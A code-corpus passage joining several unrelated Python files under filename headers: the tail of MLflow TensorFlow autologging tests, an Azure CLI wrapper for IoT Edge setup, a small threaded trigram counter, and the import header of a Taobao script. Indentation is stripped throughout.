@pytest.mark.parametrize("restore_weights", [False])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_early_stop_no_restore_doesnt_log(tf_keras_random_data_run_with_callback):
run, history, callback = tf_keras_random_data_run_with_callback
metrics = run.data.metrics
params = run.data.params
assert "patience" in params
assert params["patience"] == str(callback.patience)
assert "monitor" in params
assert params["monitor"] == "loss"
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" in metrics
assert "restored_epoch" not in metrics
assert "loss" in history.history
num_of_epochs = len(history.history["loss"])
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check the test epoch numbers are correct
assert num_of_epochs == callback.patience + 1
assert len(metric_history) == num_of_epochs
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [False])
@pytest.mark.parametrize("callback", ["not-early"])
@pytest.mark.parametrize("patience", [5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_non_early_stop_callback_no_log(tf_keras_random_data_run_with_callback):
run, history = tf_keras_random_data_run_with_callback[:-1]
metrics = run.data.metrics
params = run.data.params
assert "patience" not in params
assert "monitor" not in params
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" not in metrics
assert "restored_epoch" not in metrics
assert "loss" in history.history
num_of_epochs = len(history.history["loss"])
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check the test epoch numbers are correct
assert num_of_epochs == 10
assert len(metric_history) == num_of_epochs
@pytest.mark.parametrize("positional", [True, False])
def test_tf_keras_autolog_does_not_mutate_original_callbacks_list(
tmpdir, random_train_data, random_one_hot_labels, positional
):
"""
TensorFlow autologging passes new callbacks to the `fit()` / `fit_generator()` function. If
preexisting user-defined callbacks already exist, these new callbacks are added to the
user-specified ones. This test verifies that the new callbacks are added to the without
permanently mutating the original list of callbacks.
"""
mlflow.tensorflow.autolog()
tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=tmpdir)
callbacks = [tensorboard_callback]
model = create_tf_keras_model()
data = random_train_data
labels = random_one_hot_labels
if positional:
model.fit(data, labels, None, 10, 1, callbacks)
else:
model.fit(data, labels, epochs=10, callbacks=callbacks)
assert len(callbacks) == 1
assert callbacks == [tensorboard_callback]
@pytest.mark.large
def test_tf_keras_autolog_does_not_delete_logging_directory_for_tensorboard_callback(
tmpdir, random_train_data, random_one_hot_labels
):
tensorboard_callback_logging_dir_path = str(tmpdir.mkdir("tb_logs"))
tensorboard_callback = tf.keras.callbacks.TensorBoard(
tensorboard_callback_logging_dir_path, histogram_freq=0
)
mlflow.tensorflow.autolog()
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10, callbacks=[tensorboard_callback])
assert os.path.exists(tensorboard_callback_logging_dir_path)
@pytest.mark.large
def test_tf_keras_autolog_logs_to_and_deletes_temporary_directory_when_tensorboard_callback_absent(
tmpdir, random_train_data, random_one_hot_labels
):
from unittest import mock
from mlflow.tensorflow import _TensorBoardLogDir
mlflow.tensorflow.autolog()
mock_log_dir_inst = _TensorBoardLogDir(location=str(tmpdir.mkdir("tb_logging")), is_temp=True)
with mock.patch("mlflow.tensorflow._TensorBoardLogDir", autospec=True) as mock_log_dir_class:
mock_log_dir_class.return_value = mock_log_dir_inst
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10)
assert not os.path.exists(mock_log_dir_inst.location)
def create_tf_estimator_model(directory, export, training_steps=100, use_v1_estimator=False):
CSV_COLUMN_NAMES = ["SepalLength", "SepalWidth", "PetalLength", "PetalWidth", "Species"]
train = pd.read_csv(
os.path.join(os.path.dirname(__file__), "iris_training.csv"),
names=CSV_COLUMN_NAMES,
header=0,
)
train_y = train.pop("Species")
def input_fn(features, labels, training=True, batch_size=256):
"""An input function for training or evaluating"""
# Convert the inputs to a Dataset.
dataset = tf.data.Dataset.from_tensor_slices((dict(features), labels))
# Shuffle and repeat if you are in training mode.
if training:
dataset = dataset.shuffle(1000).repeat()
return dataset.batch(batch_size)
my_feature_columns = []
for key in train.keys():
my_feature_columns.append(tf.feature_column.numeric_column(key=key))
feature_spec = {}
for feature in CSV_COLUMN_NAMES:
feature_spec[feature] = tf.Variable([], dtype=tf.float64, name=feature)
receiver_fn = tf.estimator.export.build_raw_serving_input_receiver_fn(feature_spec)
run_config = tf.estimator.RunConfig(
# Emit loss metrics to TensorBoard every step
save_summary_steps=1,
)
# If flag set to true, then use the v1 classifier that extends Estimator
# If flag set to false, then use the v2 classifier that extends EstimatorV2
if use_v1_estimator:
classifier = tf.compat.v1.estimator.DNNClassifier(
feature_columns=my_feature_columns,
# Two hidden layers of 10 nodes each.
hidden_units=[30, 10],
# The model must choose between 3 classes.
n_classes=3,
model_dir=directory,
config=run_config,
)
else:
classifier = tf.estimator.DNNClassifier(
feature_columns=my_feature_columns,
# Two hidden layers of 10 nodes each.
hidden_units=[30, 10],
# The model must choose between 3 classes.
n_classes=3,
model_dir=directory,
config=run_config,
)
classifier.train(input_fn=lambda: input_fn(train, train_y, training=True), steps=training_steps)
if export:
classifier.export_saved_model(directory, receiver_fn)
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
def test_tf_estimator_autolog_ends_auto_created_run(tmpdir, export):
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog()
create_tf_estimator_model(str(directory), export)
assert mlflow.active_run() is None
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
def test_tf_estimator_autolog_persists_manually_created_run(tmpdir, export):
directory = tmpdir.mkdir("test")
with mlflow.start_run() as run:
create_tf_estimator_model(str(directory), export)
assert mlflow.active_run()
assert mlflow.active_run().info.run_id == run.info.run_id
@pytest.fixture
def tf_estimator_random_data_run(tmpdir, export):
# pylint: disable=unused-argument
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog()
create_tf_estimator_model(str(directory), export)
client = mlflow.tracking.MlflowClient()
return client.get_run(client.list_run_infos(experiment_id="0")[0].run_id)
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
@pytest.mark.parametrize("use_v1_estimator", [True, False])
def test_tf_estimator_autolog_logs_metrics(tmpdir, export, use_v1_estimator):
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog(every_n_iter=5)
with mlflow.start_run():
create_tf_estimator_model(
str(directory), export, use_v1_estimator=use_v1_estimator, training_steps=17
)
run_id = mlflow.active_run().info.run_id
client = mlflow.tracking.MlflowClient()
run = client.get_run(run_id)
assert "loss" in run.data.metrics
assert "steps" in run.data.params
metrics = client.get_metric_history(run_id, "loss")
assert set([metric.step for metric in metrics]) == set([1, 6, 11, 16])
@pytest.mark.large
@pytest.mark.parametrize("export", [True])
def test_tf_estimator_v1_autolog_can_load_from_artifact(tmpdir, export):
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog()
create_tf_estimator_model(str(directory), export, use_v1_estimator=True)
client = mlflow.tracking.MlflowClient()
tf_estimator_v1_run = client.get_run(client.list_run_infos(experiment_id="0")[0].run_id)
artifacts = client.list_artifacts(tf_estimator_v1_run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model" in artifacts
mlflow.tensorflow.load_model("runs:/" + tf_estimator_v1_run.info.run_id + "/model")
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
def test_tf_estimator_autolog_logs_tensorboard_logs(tf_estimator_random_data_run):
client = mlflow.tracking.MlflowClient()
artifacts = client.list_artifacts(tf_estimator_random_data_run.info.run_id)
assert any(["tensorboard_logs" in a.path and a.is_dir for a in artifacts])
@pytest.mark.large
def test_tf_estimator_autolog_logs_metrics_in_exclusive_mode(tmpdir):
mlflow.tensorflow.autolog(exclusive=True)
create_tf_estimator_model(tmpdir, export=False)
client = mlflow.tracking.MlflowClient()
tf_estimator_run = client.get_run(client.list_run_infos(experiment_id="0")[0].run_id)
assert "loss" in tf_estimator_run.data.metrics
assert "steps" in tf_estimator_run.data.params
metrics = client.get_metric_history(tf_estimator_run.info.run_id, "loss")
assert len(metrics) == 100
@pytest.mark.large
def test_tf_estimator_autolog_logs_metics_for_single_epoch_training(tmpdir):
"""
Epoch indexing behavior is consistent across TensorFlow 2: tf.Keras uses
zero-indexing for epochs, while other APIs (e.g., tf.Estimator) use one-indexing.
This test verifies that metrics are produced for tf.Estimator training sessions
in the boundary casewhere a model is trained for a single epoch, ensuring that
we capture metrics from the first epoch at index 1.
"""
mlflow.tensorflow.autolog()
with mlflow.start_run() as run:
create_tf_estimator_model(str(tmpdir), export=False, training_steps=1)
client = mlflow.tracking.MlflowClient()
metrics = client.get_metric_history(run.info.run_id, "loss")
assert len(metrics) == 1
assert metrics[0].step == 1
@pytest.mark.large
@pytest.mark.parametrize("export", [True])
def test_tf_estimator_autolog_model_can_load_from_artifact(tf_estimator_random_data_run):
client = mlflow.tracking.MlflowClient()
artifacts = client.list_artifacts(tf_estimator_random_data_run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model" in artifacts
mlflow.tensorflow.load_model("runs:/" + tf_estimator_random_data_run.info.run_id + "/model")
@pytest.mark.large
def test_flush_queue_is_thread_safe():
"""
Autologging augments TensorBoard event logging hooks with MLflow `log_metric` API
calls. To prevent these API calls from blocking TensorBoard event logs, `log_metric`
API calls are scheduled via `_flush_queue` on a background thread. Accordingly, this test
verifies that `_flush_queue` is thread safe.
"""
from threading import Thread
from mlflow.entities import Metric
from mlflow.tensorflow import _flush_queue, _metric_queue_lock
client = mlflow.tracking.MlflowClient()
run = client.create_run(experiment_id="0")
metric_queue_item = (run.info.run_id, Metric("foo", 0.1, 100, 1))
mlflow.tensorflow._metric_queue.append(metric_queue_item)
# Verify that, if another thread holds a lock on the metric queue leveraged by
# _flush_queue, _flush_queue terminates and does not modify the queue
_metric_queue_lock.acquire()
flush_thread1 = Thread(target=_flush_queue)
flush_thread1.start()
flush_thread1.join()
assert len(mlflow.tensorflow._metric_queue) == 1
assert mlflow.tensorflow._metric_queue[0] == metric_queue_item
_metric_queue_lock.release()
# Verify that, if no other thread holds a lock on the metric queue leveraged by
# _flush_queue, _flush_queue flushes the queue as expected
flush_thread2 = Thread(target=_flush_queue)
flush_thread2.start()
flush_thread2.join()
assert len(mlflow.tensorflow._metric_queue) == 0
def get_text_vec_model(train_samples):
# Taken from: https://github.com/mlflow/mlflow/issues/3910
# pylint: disable=no-name-in-module
from tensorflow.keras.layers.experimental.preprocessing import TextVectorization
VOCAB_SIZE = 10
SEQUENCE_LENGTH = 16
EMBEDDING_DIM = 16
vectorizer_layer = TextVectorization(
input_shape=(1,),
max_tokens=VOCAB_SIZE,
output_mode="int",
output_sequence_length=SEQUENCE_LENGTH,
)
vectorizer_layer.adapt(train_samples)
model = tf.keras.Sequential(
[
vectorizer_layer,
tf.keras.layers.Embedding(
VOCAB_SIZE, EMBEDDING_DIM, name="embedding", mask_zero=True, input_shape=(1,),
),
tf.keras.layers.GlobalAveragePooling1D(),
tf.keras.layers.Dense(16, activation="relu"),
tf.keras.layers.Dense(1, activation="tanh"),
]
)
model.compile(optimizer="adam", loss="mse", metrics="mae")
return model
@pytest.mark.skipif(
Version(tf.__version__) < Version("2.3.0"),
reason=(
"Deserializing a model with `TextVectorization` and `Embedding`"
"fails in tensorflow < 2.3.0. See this issue:"
"https://github.com/tensorflow/tensorflow/issues/38250"
),
)
def test_autolog_text_vec_model(tmpdir):
"""
Verifies autolog successfully saves a model that can't be saved in the H5 format
"""
mlflow.tensorflow.autolog()
train_samples = np.array(["this is an example", "another example"])
train_labels = np.array([0.4, 0.2])
model = get_text_vec_model(train_samples)
# Saving in the H5 format should fail
with pytest.raises(NotImplementedError, match="is not supported in h5"):
model.save(tmpdir.join("model.h5").strpath, save_format="h5")
with mlflow.start_run() as run:
model.fit(train_samples, train_labels, epochs=1)
loaded_model = mlflow.keras.load_model("runs:/" + run.info.run_id + "/model")
np.testing.assert_array_equal(loaded_model.predict(train_samples), model.predict(train_samples))
def test_fit_generator(random_train_data, random_one_hot_labels):
mlflow.tensorflow.autolog()
model = create_tf_keras_model()
def generator():
while True:
yield random_train_data, random_one_hot_labels
with mlflow.start_run() as run:
model.fit_generator(generator(), epochs=10, steps_per_epoch=1)
run = mlflow.tracking.MlflowClient().get_run(run.info.run_id)
params = run.data.params
metrics = run.data.metrics
assert "epochs" in params
assert params["epochs"] == "10"
assert "steps_per_epoch" in params
assert params["steps_per_epoch"] == "1"
assert "accuracy" in metrics
assert "loss" in metrics
@pytest.mark.large
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_fluent_autolog_with_tf_keras_logs_expected_content(
random_train_data, random_one_hot_labels
):
"""
Guards against previously-exhibited issues where using the fluent `mlflow.autolog()` API with
`tf.keras` Models did not work due to conflicting patches set by both the
`mlflow.tensorflow.autolog()` and the `mlflow.keras.autolog()` APIs.
"""
mlflow.autolog()
model = create_tf_keras_model()
with mlflow.start_run() as run:
model.fit(random_train_data, random_one_hot_labels, epochs=10)
client = mlflow.tracking.MlflowClient()
run_data = client.get_run(run.info.run_id).data
assert "accuracy" in run_data.metrics
assert "epochs" in run_data.params
artifacts = client.list_artifacts(run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model" in artifacts
@pytest.mark.large
@pytest.mark.skipif(
Version(tf.__version__) < Version("2.6.0"),
reason=("TensorFlow only has a hard dependency on Keras in version >= 2.6.0"),
)
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_fluent_autolog_with_tf_keras_preserves_v2_model_reference():
"""
Verifies that, in TensorFlow >= 2.6.0, `tensorflow.keras.Model` refers to the correct class in
the correct module after `mlflow.autolog()` is called, guarding against previously identified
compatibility issues between recent versions of TensorFlow and MLflow's internal utility for
setting up autologging import hooks.
"""
mlflow.autolog()
import tensorflow.keras
from keras.api._v2.keras import Model as ModelV2
assert tensorflow.keras.Model is ModelV2
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_import_tensorflow_with_fluent_autolog_enables_tf_autologging():
mlflow.autolog()
import tensorflow # pylint: disable=unused-variable,unused-import,reimported
assert not autologging_is_disabled(mlflow.tensorflow.FLAVOR_NAME)
# NB: In Tensorflow >= 2.6, we redirect keras autologging to tensorflow autologging
# so the original keras autologging is disabled
if Version(tf.__version__) >= Version("2.6"):
import keras # pylint: disable=unused-variable,unused-import
assert autologging_is_disabled(mlflow.keras.FLAVOR_NAME)
@pytest.mark.large
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_import_tf_keras_with_fluent_autolog_enables_tf_autologging():
mlflow.autolog()
import tensorflow.keras # pylint: disable=unused-variable,unused-import
assert not autologging_is_disabled(mlflow.tensorflow.FLAVOR_NAME)
# NB: In Tensorflow >= 2.6, we redirect keras autologging to tensorflow autologging
# so the original keras autologging is disabled
if Version(tf.__version__) >= Version("2.6"):
# NB: For TF >= 2.6, import tensorflow.keras will trigger importing keras
assert autologging_is_disabled(mlflow.keras.FLAVOR_NAME)
@pytest.mark.large
@pytest.mark.skipif(
Version(tf.__version__) < Version("2.6.0"),
reason=("TensorFlow autologging is not used for vanilla Keras models in Keras < 2.6.0"),
)
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_import_keras_with_fluent_autolog_enables_tensorflow_autologging():
mlflow.autolog()
import keras # pylint: disable=unused-variable,unused-import
assert not autologging_is_disabled(mlflow.tensorflow.FLAVOR_NAME)
assert autologging_is_disabled(mlflow.keras.FLAVOR_NAME)
|
azurecli.py
|
import json
import os
import signal
import subprocess
import sys
from io import StringIO
from threading import Thread, Timer
from azure.cli.core import get_default_cli
from fstrings import f
from six.moves.queue import Empty, Queue
from . import telemetry
from .compat import PY2
if PY2:
from .compat import FileNotFoundError
output_io_cls = StringIO
def get_query_argument_for_id_and_name(token):
return "[?starts_with(@.id,'{0}') || contains(@.name,'{1}')]".format(token.lower(), token)
class AzureCli:
def __init__(self, output, envvars, cli=get_default_cli()):
self.output = output
self.envvars = envvars
self.az_cli = cli
self.process = None
self._proc_terminated = False
def decode(self, val):
return val.decode("utf-8").strip()
def is_posix(self):
return self.envvars.is_posix()
def prepare_az_cli_args(self, args, suppress_output=False):
if suppress_output:
args.extend(["--query", "\"[?n]|[0]\""])
az_args = ["az"]+args
return az_args
def invoke_az_cli_outproc(self, args, error_message=None, stdout_io=None, stderr_io=None, suppress_output=False, timeout=None):
try:
if timeout:
timeout = int(timeout)
monitor_events = False
if 'monitor-events' in args:
monitor_events = True
self._proc_terminated = False
# Consider using functools
if monitor_events:
process = subprocess.Popen(self.prepare_az_cli_args(args, suppress_output),
shell=not self.is_posix(),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
preexec_fn=os.setsid if self.is_posix() else None,
creationflags=subprocess.CREATE_NEW_PROCESS_GROUP if not self.is_posix() else 0)
elif stdout_io or stderr_io:
process = subprocess.Popen(self.prepare_az_cli_args(args, suppress_output),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=not self.is_posix())
else:
process = subprocess.Popen(self.prepare_az_cli_args(args, suppress_output),
shell=not self.is_posix())
self.process = process
timer = None
if timeout:
# This Timer will attempt to be accurate but its not always the case in practice
timer = Timer(float(timeout),
self._terminate_process_tree,
args=['Timeout set to {0} seconds, which expired as expected.'.format(timeout)])
try:
if timer:
timer.start()
if not monitor_events:
stdout_data, stderr_data = process.communicate()
else:
return self._handle_monitor_event_process(process)
finally:
if timer:
timer.cancel()
if stderr_data and b"invalid_grant" in stderr_data:
self.output.error(self.decode(stderr_data))
self.output.info(
"Your Azure CLI session has expired. Please re-run `iotedgedev iothub setup` to refresh your credentials.")
self.logout()
sys.exit()
if stdout_io and stdout_data != "":
stdout_io.writelines(self.decode(stdout_data))
if stderr_io and stderr_data != "":
stderr_io.writelines(self.decode(stderr_data))
if process.returncode != 0:
if error_message:
self.output.error(error_message)
self.output.line()
return False
if not stdout_io and not stderr_io:
self.output.line()
except Exception as e:
if error_message:
self.output.error(error_message)
self.output.error(str(e))
self.output.line()
return False
return True
def _enqueue_stream(self, stream, queue):
try:
while not self._proc_terminated:
queue.put(stream.readline().decode('utf8').rstrip())
finally:
stream.close()
def _handle_monitor_event_process(self, process, error_message=None):
stdout_queue = Queue()
stderr_queue = Queue()
stream_thread_map = {
'stdout': Thread(target=self._enqueue_stream, args=(process.stdout, stdout_queue), daemon=True),
'stderr': Thread(target=self._enqueue_stream, args=(process.stderr, stderr_queue), daemon=True)
}
stream_thread_map['stdout'].start()
stream_thread_map['stderr'].start()
try:
while not self._proc_terminated:
if not process.poll():
try:
self.output.echo(stdout_queue.get_nowait())
except Empty:
pass
else:
err = None
try:
err = stderr_queue.get_nowait()
except Empty:
pass
# Avoid empty sys.excepthook errors from underlying future
# There is already a uAMQP issue in work for this
# https://github.com/Azure/azure-uamqp-python/issues/30
if err and "sys.excepthook" not in err:
err = err.lstrip()
err = err.lstrip('ERROR:')
if error_message:
err = "{}: {}".format(error_message, err)
self.output.error(err)
return False
except KeyboardInterrupt:
self.output.info('Terminating process...')
self._terminate_process_tree()
return True
def _terminate_process_tree(self, msg=None):
try:
if self.process:
if self.is_posix():
os.killpg(os.getpgid(self.process.pid), signal.SIGTERM)
else:
self.process.send_signal(signal.CTRL_BREAK_EVENT)
self.process.kill()
self._proc_terminated = True
if msg:
self.output.info(msg)
self.output.line()
return True
except Exception:
return False
def invoke_az_cli(self, args, error_message=None, stdout_io=None):
try:
exit_code = self.az_cli.invoke(args, out_file=stdout_io)
if exit_code and exit_code != 0:
if error_message:
self.output.error(error_message)
return False
except Exception as e:
if error_message:
self.output.error(error_message)
self.output.error(str(e))
return False
self.output.line()
return True
def add_extension(self, name):
return self.invoke_az_cli_outproc(["extension", "add", "--name", name,
"--yes"],
f("Error while adding extension {name}."), suppress_output=True)
def add_extension_with_source(self, source_url):
return self.invoke_az_cli_outproc(["extension", "add", "--source", source_url,
"--yes"],
f("Error while add extension from source {source_url}."),
suppress_output=True)
def extension_exists(self, name):
return self.invoke_az_cli_outproc(["extension", "show", "--name", name, "--output", "table"],
f("Error while checking for extension {name}."), suppress_output=True)
def user_has_logged_in(self):
self.output.header("AUTHENTICATION")
self.output.status(f("Retrieving Azure CLI credentials from cache..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(
["account", "show"], stdout_io=io)
if result:
try:
self.output.prompt("Azure CLI credentials found.")
out_string = io.getvalue()
data = json.loads(out_string)
return data["id"]
except Exception:
pass
self.output.prompt(
"Azure CLI credentials not found. Please follow instructions below to login to the Azure CLI.")
return None
def login_account(self, username, password):
return self.invoke_az_cli_outproc(["login", "-u", username,
"-p", password],
"Error while trying to login to Azure. Make sure your account credentials are correct", suppress_output=True)
def login_sp(self, username, password, tenant):
return self.invoke_az_cli_outproc(["login", "--service-principal", "-u", username,
"-p", password, "--tenant", tenant],
"Error while trying to login to Azure. Make sure your service principal credentials are correct.", suppress_output=True)
def login_interactive(self):
return self.invoke_az_cli_outproc(["login"],
"Error while trying to login to Azure.", suppress_output=True)
def logout(self):
return self.invoke_az_cli_outproc(["account", "clear"])
def list_subscriptions(self):
self.output.status("Retrieving Azure Subscriptions...")
return self.invoke_az_cli_outproc(["account", "list", "--all", "--query", "[].{\"Subscription Name\":name, Id:id}", "--out", "table"],
"Error while trying to list Azure subscriptions.")
def get_default_subscription(self):
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["account", "show"],
"Error while trying to get the default Azure subscription id.", io)
if result:
out_string = io.getvalue()
data = json.loads(out_string)
return data["id"]
return ''
def get_subscription_id_starts_with(self, token):
with output_io_cls() as io:
query = get_query_argument_for_id_and_name(token)
result = self.invoke_az_cli_outproc(["account", "list", "--query", query],
"Could not find a subscription for which the id starts with or name contains '{0}'".format(token), io)
if result:
out_string = io.getvalue()
if out_string:
data = json.loads(out_string)
if len(data) == 1:
return data[0]["id"]
elif len(data) > 1:
self.output.error(
"Found multiple subscriptions for which the ids start with or names contain '{0}'. Please enter more characters to further refine your selection.".format(token))
return token
else:
self.output.error("Could not find a subscription for which the id starts with or name contains '{0}'.".format(token))
return ''
def set_subscription(self, subscription):
if len(subscription) < 36:
subscription = self.get_subscription_id_starts_with(subscription)
if len(subscription) < 36:
return subscription
if len(subscription) == 36:
self.output.status(f("Setting Subscription to '{subscription}'..."))
result = self.invoke_az_cli_outproc(["account", "set", "--subscription", subscription],
"Error while trying to set Azure subscription.")
if result:
return subscription
return None
def resource_group_exists(self, name):
self.output.status(f("Checking if Resource Group '{name}' exists..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["group", "exists", "-n", name],
f("Resource Group {name} does not exist."), io)
if result:
out_string = io.getvalue()
if out_string == "true":
return True
self.output.prompt(f("Resource Group {name} does not exist."))
return False
def get_resource_group_location(self, name):
self.output.status(f("Retrieving Resource Group '{name}' location..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["group", "show", "-n", name, "--query", "location", "--output", "tsv"],
f("Could not retrieve Resource Group {name}'s location."), io)
if result:
return io.getvalue()
else:
return ''
def create_resource_group(self, name, location):
self.output.status(
f("Creating Resource Group '{name}' at '{location}'..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["group", "create", "--name", name, "--location", location],
f("Could not create the new Resource Group {name} at location:{location}."), io)
return result
def list_resource_groups(self):
self.output.header("RESOURCE GROUP")
self.output.status("Retrieving Resource Groups...")
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["group", "list", "--query", "[].{\"Resource Group\":name, Location:location}", "--out", "table"], "Could not list the Resource Groups.", stdout_io=io)
self.output.prompt(io.getvalue())
self.output.line()
return result
def set_modules(self, device_id, connection_string, config):
self.output.status(f("Deploying '{config}' to '{device_id}'..."))
config = os.path.join(os.getcwd(), config)
if not os.path.exists(config):
raise FileNotFoundError('Deployment manifest file "{0}" not found. Please run `iotedgedev build` first'.format(config))
telemetry.add_extra_props({'iothubhostname': connection_string.iothub_host.name_hash, 'iothubhostnamesuffix': connection_string.iothub_host.name_suffix})
return self.invoke_az_cli_outproc(["iot", "edge", "set-modules", "-d", device_id, "-n", connection_string.iothub_host.hub_name, "-k", config, "-l", connection_string.connection_string],
error_message=f("Failed to deploy '{config}' to '{device_id}'..."), suppress_output=True)
def monitor_events(self, device_id, connection_string, hub_name, timeout=300):
return self.invoke_az_cli_outproc(["iot", "hub", "monitor-events", "-d", device_id, "-n", hub_name, "-l", connection_string, '-t', str(timeout), '-y'],
error_message=f("Failed to start monitoring events."), suppress_output=False, timeout=timeout)
def get_free_iothub(self):
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["iot", "hub", "list"], f("Could not list IoT Hubs in subscription."), stdout_io=io)
if result:
out_string = io.getvalue()
data = json.loads(out_string)
for iot in data:
if iot["sku"]["name"] == "F1":
return (iot["name"], iot["resourceGroup"])
return (None, None)
def get_first_iothub(self, resource_group):
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(
["iot", "hub", "list", "--resource-group", resource_group, "--query", "[0]"], f("Could not get first IoT Hub."), io)
if result:
out_string = io.getvalue()
if out_string:
data = json.loads(out_string)
return data["name"]
return ''
def list_iot_hubs(self, resource_group):
self.output.header("IOT HUB")
self.output.status(f("Retrieving IoT Hubs in '{resource_group}'..."))
return self.invoke_az_cli_outproc(["iot", "hub", "list", "--resource-group", resource_group, "--query", "[].{\"IoT Hub\":name}", "--out", "table"],
f("Could not list the IoT Hubs in {resource_group}."))
def iothub_exists(self, value, resource_group):
self.output.status(
f("Checking if '{value}' IoT Hub exists..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["iot", "hub", "show", "--name", value, "--resource-group",
resource_group, "--out", "table"], stderr_io=io)
if not result:
self.output.prompt(
f("Could not locate the {value} in {resource_group}."))
return result
def create_iothub(self, value, resource_group, sku):
self.output.status(
f("Creating '{value}' in '{resource_group}' with '{sku}' sku..."))
with output_io_cls() as io:
with output_io_cls() as error_io:
self.output.prompt(
"Creating IoT Hub. Please wait as this could take a few minutes to complete...")
result = self.invoke_az_cli_outproc(["iot", "hub", "create", "--name", value, "--resource-group",
resource_group, "--sku", sku, "--query", "[].{\"IoT Hub\":name}", "--out", "table"],
f("Could not create the IoT Hub {value} in {resource_group} with sku {sku}."), stdout_io=io, stderr_io=error_io)
if not result and error_io.getvalue():
self.output.error(error_io.getvalue())
self.output.line()
elif io.getvalue():
self.output.prompt(io.getvalue())
self.output.line()
return result
def get_iothub_connection_string(self, value, resource_group):
self.output.status(
f("Retrieving '{value}' connection string..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["iot", "hub", "show-connection-string", "--hub-name", value,
"--resource-group", resource_group],
f("Could not create the IoT Hub {value} in {resource_group}."), stdout_io=io)
if result:
out_string = io.getvalue()
data = json.loads(out_string)
if "cs" in data:
return data["cs"]
else:
return data["connectionString"]
return ''
def edge_device_exists(self, value, iothub, resource_group):
self.output.status(
f("Checking if '{value}' device exists in '{iothub}'..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["iot", "hub", "device-identity", "show", "--device-id", value, "--hub-name", iothub,
"--resource-group", resource_group, "--out", "table"], stderr_io=io)
if not result:
self.output.prompt(
f("Could not locate the {value} device in {iothub} IoT Hub in {resource_group}."))
return result
def list_edge_devices(self, iothub):
self.output.header("EDGE DEVICE")
self.output.status(
f("Retrieving edge devices in '{iothub}'..."))
return self.invoke_az_cli_outproc(["iot", "hub", "device-identity", "list", "--hub-name", iothub,
"--edge-enabled", "--query", "[].{\"Device Id\":deviceId}", "--output", "table"],
f("Could not list the edge devices in {iothub} IoT Hub."))
def create_edge_device(self, value, iothub, resource_group):
self.output.status(
f("Creating '{value}' edge device in '{iothub}'..."))
return self.invoke_az_cli_outproc(["iot", "hub", "device-identity", "create", "--device-id", value, "--hub-name", iothub,
"--resource-group", resource_group, "--edge-enabled", "--query", "[].{\"Device Id\":deviceId}", "--output", "table"],
f("Could not locate the {value} device in {iothub} IoT Hub in {resource_group}."))
def get_device_connection_string(self, value, iothub, resource_group):
self.output.status(
f("Retrieving '{value}' connection string..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["iot", "hub", "device-identity", "show-connection-string", "--device-id", value, "--hub-name", iothub,
"--resource-group", resource_group],
f("Could not locate the {value} device in {iothub} IoT Hub in {resource_group}."), stdout_io=io)
if result:
out_string = io.getvalue()
data = json.loads(out_string)
if "cs" in data:
return data["cs"]
else:
return data["connectionString"]
return ''
|
lab5.py
|
import threading
tr_dict = dict()
mutex = threading.Lock()
prohibited = (',','.','?','!','-','+','\'','@')
def Count_trigrams(in_str):
trgrms = dict()
trgrm = ""
for i in in_str:
if i not in prohibited:
trgrm += i
else:
trgrm = ""
if len(trgrm) == 3:
if trgrm in trgrms:
trgrms[trgrm] += 1
else:
trgrms[trgrm] = 1
trgrm = trgrm[1:]
Add_to_global(trgrms)
def Add_to_global(trgrms):
for i in trgrms:
mutex.acquire()
if i in tr_dict:
tr_dict[i] += trgrms[i]
else:
tr_dict[i] = trgrms[i]
mutex.release()
in_str = input("input your string here:\n")
strs = in_str.split()
threads = [
threading.Thread(target = Count_trigrams, args = (s,))
for s in strs
]
for t in threads:
t.start()
for t in threads:
t.join()
print(tr_dict)
|
old_alimama.py
|
# encoding: utf-8
import os
import re
import json
import os.path
import configparser
import platform
import random
import sys
import time
import traceback
import datetime
if sys.version_info[0] < 3:
import urllib
else:
import urllib.parse as urllib
from io import BytesIO
import pyqrcode
import requests
from PIL import Image
from threading import Thread
from libs.mysql import ConnectMysql
from libs.orther import Orther
from libs.movie import SharMovie
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
cookie_fname = 'cookies_taobao.txt'
config = configparser.ConfigParser()
